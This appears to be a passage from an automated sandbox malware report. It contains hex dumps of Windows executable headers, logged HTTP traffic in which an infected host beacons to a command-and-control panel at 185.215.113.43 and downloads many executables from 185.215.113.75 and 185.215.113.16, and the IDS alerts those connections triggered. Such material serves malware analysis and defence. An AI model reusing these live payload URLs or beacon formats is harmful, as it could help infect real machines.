00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 70 75 68 68 64 76 67 00 90 1a 00 00 20 31 00 00 8c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 72 74 6a 65 76 65 00 10 00 00 00 b0 4b 00 00 06 00 00 00 ee 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 f4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:26 GMTContent-Type: application/octet-streamContent-Length: 1813504Last-Modified: Mon, 10 Feb 2025 16:18:45 GMTConnection: keep-aliveETag: "67aa26e5-1bac00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 a0 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 47 00 00 04 00 00 ac 71 1c 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 73 75 70 6e 70 6d 00 c0 1a 00 00 c0 2c 00 00 ba 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6a 78 75 69 62 76 77 00 20 00 00 00 80 47 00 00 04 00 00 00 86 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 47 00 00 22 00 00 00 8a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:56 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:56 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 33 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075350001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 34 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075489001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 34 39 30 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075490021&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075509001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075510001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075511001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075512001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075513001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075514001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Tue, 11 Feb 2025 14:56:33 GMTIf-None-Match: "67ab6521-249e00"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075515001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7244183739/L5shRfh.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075516001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075517001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6158422886/r7MRNUY.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 37 35 35 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1075518001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075519001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5765828710/ViGgA8C.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.75 185.215.113.75

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49790 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49819 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49891 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49916 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49921 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49927 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49934 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49945 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49957 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49954 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49964 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49972 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49976 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49980 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49988 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49995 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50008 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50020 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50047 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50062 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50067 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50070 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50074 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50075 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50076 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50071 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50072 -> 104.21.0.135:443
